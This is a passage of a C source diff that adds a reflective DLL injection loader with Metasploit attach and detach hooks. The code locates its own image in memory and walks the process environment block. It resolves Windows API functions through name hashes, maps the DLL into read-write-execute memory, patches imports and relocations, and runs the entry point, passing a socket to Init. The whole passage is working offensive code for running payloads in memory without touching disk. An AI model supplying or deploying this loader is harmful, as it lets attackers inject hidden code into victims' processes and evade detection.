+	// loop through memory backwards searching for our images base address
+	// we dont need SEH style search as we shouldnt generate any access violations with this
+	while (TRUE)
+	{
+		if (((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE)
+		{
+			uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
+			// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
+			// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
+			if (uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024)
+			{
+				uiHeaderValue += uiLibraryAddress;
+				// break if we have found a valid MZ/PE header
+				if (((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE)
+					break;
+			}
+		}
+		uiLibraryAddress--;
+	}
+
+	// STEP 1: process the kernels exports for the functions our loader needs...
+
+	// get the Process Enviroment Block
+#ifdef _WIN64
+	uiBaseAddress = __readgsqword(0x60);
+#else
+#ifdef WIN_ARM
+	uiBaseAddress = *(DWORD *)((BYTE *)_MoveFromCoprocessor(15, 0, 13, 0, 2) + 0x30);
+#else _WIN32
+	uiBaseAddress = __readfsdword(0x30);
+#endif
+#endif
+
+	// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
+	uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
+
+	// get the first entry of the InMemoryOrder module list
+	uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
+	while (uiValueA)
+	{
+		// get pointer to current modules name (unicode string)
+		uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
+		// set bCounter to the length for the loop
+		usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
+		// clear uiValueC which will store the hash of the module name
+		uiValueC = 0;
+
+		// compute the hash of the module name...
+		do
+		{
+			uiValueC = ror((DWORD)uiValueC);
+			// normalize to uppercase if the module name is in lowercase
+			if (*((BYTE *)uiValueB) >= 'a')
+				uiValueC += *((BYTE *)uiValueB) - 0x20;
+			else
+				uiValueC += *((BYTE *)uiValueB);
+			uiValueB++;
+		} while (--usCounter);
+
+		// compare the hash with that of kernel32.dll
+		if ((DWORD)uiValueC == KERNEL32DLL_HASH)
+		{
+			// get this modules base address
+			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
+
+			// get the VA of the modules NT Header
+			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
+
+			// uiNameArray = the address of the modules export directory entry
+			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
+
+			// get the VA of the export directory
+			uiExportDir = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress);
+
+			// get the VA for the array of name pointers
+			uiNameArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames);
+
+			// get the VA for the array of name ordinals
+			uiNameOrdinals = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals);
+
+			usCounter = 3;
+#ifdef ENABLE_STOPPAGING
+			usCounter++;
+#endif
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+			usCounter++;
+#endif
+
+			// loop while we still have imports to find
+			while (usCounter > 0)
+			{
+				// compute the hash values for this function name
+				dwHashValue = _hash((char *)(uiBaseAddress + DEREF_32(uiNameArray)));
+
+				// if we have found a function we want we get its virtual address
+				if (dwHashValue == LOADLIBRARYA_HASH
+					|| dwHashValue == GETPROCADDRESS_HASH
+					|| dwHashValue == VIRTUALALLOC_HASH
+#ifdef ENABLE_STOPPAGING
+					|| dwHashValue == VIRTUALLOCK_HASH
+#endif
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+					|| dwHashValue == OUTPUTDEBUG_HASH
+#endif
+					)
+				{
+					// get the VA for the array of addresses
+					uiAddressArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions);
+
+					// use this functions name ordinal as an index into the array of name pointers
+					uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD));
+
+					// store this functions VA
+					if (dwHashValue == LOADLIBRARYA_HASH)
+						pLoadLibraryA = (LOADLIBRARYA)(uiBaseAddress + DEREF_32(uiAddressArray));
+					else if (dwHashValue == GETPROCADDRESS_HASH)
+						pGetProcAddress = (GETPROCADDRESS)(uiBaseAddress + DEREF_32(uiAddressArray));
+					else if (dwHashValue == VIRTUALALLOC_HASH)
+						pVirtualAlloc = (VIRTUALALLOC)(uiBaseAddress + DEREF_32(uiAddressArray));
+#ifdef ENABLE_STOPPAGING
+					else if (dwHashValue == VIRTUALLOCK_HASH)
+						pVirtualLock = (VIRTUALLOCK)(uiBaseAddress + DEREF_32(uiAddressArray));
+#endif
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+					else if (dwHashValue == OUTPUTDEBUG_HASH)
+						pOutputDebug = (OUTPUTDEBUG)(uiBaseAddress + DEREF_32(uiAddressArray));
+#endif
+
+					// decrement our counter
+					usCounter--;
+				}
+
+				// get the next exported function name
+				uiNameArray += sizeof(DWORD);
+
+				// get the next exported function name ordinal
+				uiNameOrdinals += sizeof(WORD);
+			}
+		}
+		else if ((DWORD)uiValueC == NTDLLDLL_HASH)
+		{
+			// get this modules base address
+			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
+
+			// get the VA of the modules NT Header
+			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
+
+			// uiNameArray = the address of the modules export directory entry
+			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
+
+			// get the VA of the export directory
+			uiExportDir = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress);
+
+			// get the VA for the array of name pointers
+			uiNameArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames);
+
+			// get the VA for the array of name ordinals
+			uiNameOrdinals = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals);
+
+			usCounter = 1;
+
+			// loop while we still have imports to find
+			while (usCounter > 0)
+			{
+				// compute the hash values for this function name
+				dwHashValue = _hash((char *)(uiBaseAddress + DEREF_32(uiNameArray)));
+
+				// if we have found a function we want we get its virtual address
+				if (dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH)
+				{
+					// get the VA for the array of addresses
+					uiAddressArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions);
+
+					// use this functions name ordinal as an index into the array of name pointers
+					uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD));
+
+					// store this functions VA
+					if (dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH)
+						pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)(uiBaseAddress + DEREF_32(uiAddressArray));
+
+					// decrement our counter
+					usCounter--;
+				}
+
+				// get the next exported function name
+				uiNameArray += sizeof(DWORD);
+
+				// get the next exported function name ordinal
+				uiNameOrdinals += sizeof(WORD);
+			}
+		}
+
+		// we stop searching when we have found everything we need.
+		if (pLoadLibraryA
+			&& pGetProcAddress
+			&& pVirtualAlloc
+#ifdef ENABLE_STOPPAGING
+			&& pVirtualLock
+#endif
+			&& pNtFlushInstructionCache
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+			&& pOutputDebug
+#endif
+			)
+			break;
+
+		// get the next entry
+		uiValueA = DEREF(uiValueA);
+	}
+
+	// STEP 2: load our image into a new permanent location in memory...
+
+	// get the VA of the NT Header for the PE to be loaded
+	uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
+
+	// allocate all the memory for the DLL to be loaded into. we can load at any address because we will  
+	// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
+	uiBaseAddress = (ULONG_PTR)pVirtualAlloc(NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+#ifdef ENABLE_STOPPAGING
+	// prevent our image from being swapped to the pagefile
+	pVirtualLock((LPVOID)uiBaseAddress, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage);
+#endif
+
+	// we must now copy over the headers
+	uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
+	uiValueB = uiLibraryAddress;
+	uiValueC = uiBaseAddress;
+
+	while (uiValueA--)
+		*(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;
+
+	// STEP 3: load in all of our sections...
+
+	// uiValueA = the VA of the first section
+	uiValueA = ((ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader);
+
+	// itterate through all sections, loading them into memory.
+	uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
+	while (uiValueE--)
+	{
+		// uiValueB is the VA for this section
+		uiValueB = (uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress);
+
+		// uiValueC if the VA for this sections data
+		uiValueC = (uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData);
+
+		// copy the section over
+		uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
+
+		while (uiValueD--)
+			*(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
+
+		// get the VA of the next section
+		uiValueA += sizeof(IMAGE_SECTION_HEADER);
+	}
+
+	// STEP 4: process our images import table...
+
+	// uiValueB = the address of the import directory
+	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
+
+	// we assume there is an import table to process
+	// uiValueC is the first entry in the import table
+	uiValueC = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress);
+
+	// iterate through all imports until a null RVA is found (Characteristics is mis-named)
+	while (((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Characteristics)
+	{
+		OUTPUTDBG("Loading library: ");
+		OUTPUTDBG((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name));
+		OUTPUTDBG("\n");
+
+		// use LoadLibraryA to load the imported module into memory
+		uiLibraryAddress = (ULONG_PTR)pLoadLibraryA((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name));
+
+		if (!uiLibraryAddress)
+		{
+			OUTPUTDBG("Loading library FAILED\n");
+
+			uiValueC += sizeof(IMAGE_IMPORT_DESCRIPTOR);
+			continue;
+		}
+
+		// uiValueD = VA of the OriginalFirstThunk
+		uiValueD = (uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk);
+
+		// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
+		uiValueA = (uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk);
+
+		// itterate through all imported functions, importing by ordinal if no name present
+		while (DEREF(uiValueA))
+		{
+			// sanity check uiValueD as some compilers only import by FirstThunk
+			if (uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG)
+			{
+				// get the VA of the modules NT Header
+				uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
+
+				// uiNameArray = the address of the modules export directory entry
+				uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
+
+				// get the VA of the export directory
+				uiExportDir = (uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress);
+
+				// get the VA for the array of addresses
+				uiAddressArray = (uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions);
+
+				// use the import ordinal (- export ordinal base) as an index into the array of addresses
+				uiAddressArray += ((IMAGE_ORDINAL(((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal) - ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->Base) * sizeof(DWORD));
+
+				// patch in the address for this imported function
+				DEREF(uiValueA) = (uiLibraryAddress + DEREF_32(uiAddressArray));
+			}
+			else
+			{
+				// get the VA of this functions import by name struct
+				uiValueB = (uiBaseAddress + DEREF(uiValueA));
+
+				OUTPUTDBG("Resolving function: ");
+				OUTPUTDBG(((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name);
+				OUTPUTDBG("\n");
+
+				// use GetProcAddress and patch in the address for this imported function
+				DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress((HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name);
+			}
+			// get the next imported function
+			uiValueA += sizeof(ULONG_PTR);
+			if (uiValueD)
+				uiValueD += sizeof(ULONG_PTR);
+		}
+
+		// get the next import
+		uiValueC += sizeof(IMAGE_IMPORT_DESCRIPTOR);
+	}
+
+	// STEP 5: process all of our images relocations...
+
+	// calculate the base address delta and perform relocations (even if we load at desired image base)
+	uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
+
+	// uiValueB = the address of the relocation directory
+	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
+
+	// check if their are any relocations present
+	if (((PIMAGE_DATA_DIRECTORY)uiValueB)->Size)
+	{
+		// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
+		uiValueC = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress);
+
+		// and we itterate through all entries...
+		while (((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock)
+		{
+			// uiValueA = the VA for this relocation block
+			uiValueA = (uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress);
+
+			// uiValueB = number of entries in this relocation block
+			uiValueB = (((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOC);
+
+			// uiValueD is now the first entry in the current relocation block
+			uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
+
+			// we itterate through all the entries in the current block...
+			while (uiValueB--)
+			{
+				// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
+				// we dont use a switch statement to avoid the compiler building a jump table
+				// which would not be very position independent!
+				if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64)
+					*(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
+				else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW)
+					*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
+#ifdef WIN_ARM
+				// Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem.
+				else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T)
+				{
+					register DWORD dwInstruction;
+					register DWORD dwAddress;
+					register WORD wImm;
+					// get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word)
+					dwInstruction = *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD));
+					// flip the words to get the instruction as expected
+					dwInstruction = MAKELONG(HIWORD(dwInstruction), LOWORD(dwInstruction));
+					// sanity chack we are processing a MOV instruction...
+					if ((dwInstruction & ARM_MOV_MASK) == ARM_MOVT)
+					{
+						// pull out the encoded 16bit value (the high portion of the address-to-relocate)
+						wImm = (WORD)(dwInstruction & 0x000000FF);
+						wImm |= (WORD)((dwInstruction & 0x00007000) >> 4);
+						wImm |= (WORD)((dwInstruction & 0x04000000) >> 15);
+						wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4);
+						// apply the relocation to the target address
+						dwAddress = ((WORD)HIWORD(uiLibraryAddress) + wImm) & 0xFFFF;
+						// now create a new instruction with the same opcode and register param.
+						dwInstruction = (DWORD)(dwInstruction & ARM_MOV_MASK2);
+						// patch in the relocated address...
+						dwInstruction |= (DWORD)(dwAddress & 0x00FF);
+						dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4;
+						dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15;
+						dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4;
+						// now flip the instructions words and patch back into the code...
+						*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD)) = MAKELONG(HIWORD(dwInstruction), LOWORD(dwInstruction));
+					}
+				}
+#endif
+				else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH)
+					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
+				else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW)
+					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
+
+				// get the next entry in the current relocation block
+				uiValueD += sizeof(IMAGE_RELOC);
+			}
+
+			// get the next entry in the relocation directory
+			uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
+		}
+	}
+
+	// STEP 6: call our images entry point
+
+	// uiValueA = the VA of our newly loaded DLL/EXE's entry point
+	uiValueA = (uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint);
+
+	OUTPUTDBG("Flushing the instruction cache");
+	// We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
+	pNtFlushInstructionCache((HANDLE)-1, NULL, 0);
+
+	// call our respective entry point, fudging our hInstance value
+#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+	// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
+	((DLLMAIN)uiValueA)((HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter);
+#else
+	// if we are injecting an DLL via a stub we call DllMain with no parameter
+	((DLLMAIN)uiValueA)((HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL);
+#endif
+
+	// STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
+	return uiValueA;
+}
+//===============================================================================================//
+#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+
+// you must implement this function...
+extern DWORD DLLEXPORT Init(SOCKET socket);
+
+BOOL MetasploitDllAttach(SOCKET socket)
+{
+	Init(socket);
+	return TRUE;
+}
+
+BOOL MetasploitDllDetach(DWORD dwExitFunc)
+{
+	switch (dwExitFunc)
+	{
+	case EXITFUNC_SEH:
+		SetUnhandledExceptionFilter(NULL);
+		break;
+	case EXITFUNC_THREAD:
+		ExitThread(0);
+		break;
+	case EXITFUNC_PROCESS:
+		ExitProcess(0);
+		break;
+	default:
+		break;
+	}
+
+	return TRUE;
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
+{
+	BOOL bReturnValue = TRUE;
+
+	switch (dwReason)
+	{
+	case DLL_METASPLOIT_ATTACH:
+		bReturnValue = MetasploitDllAttach((SOCKET)lpReserved);
+		break;
+	case DLL_METASPLOIT_DETACH:
+		bReturnValue = MetasploitDllDetach((DWORD)lpReserved);
+		break;
+	case DLL_QUERY_HMODULE:
+		if (lpReserved != NULL)
+			*(HMODULE *)lpReserved = hAppInstance;
+		break;
+	case DLL_PROCESS_ATTACH:
+		hAppInstance = hinstDLL;
+		break;
+	case DLL_PROCESS_DETACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+		break;
+	}
+	return bReturnValue;
+}
+
+#endif
+//===============================================================================================//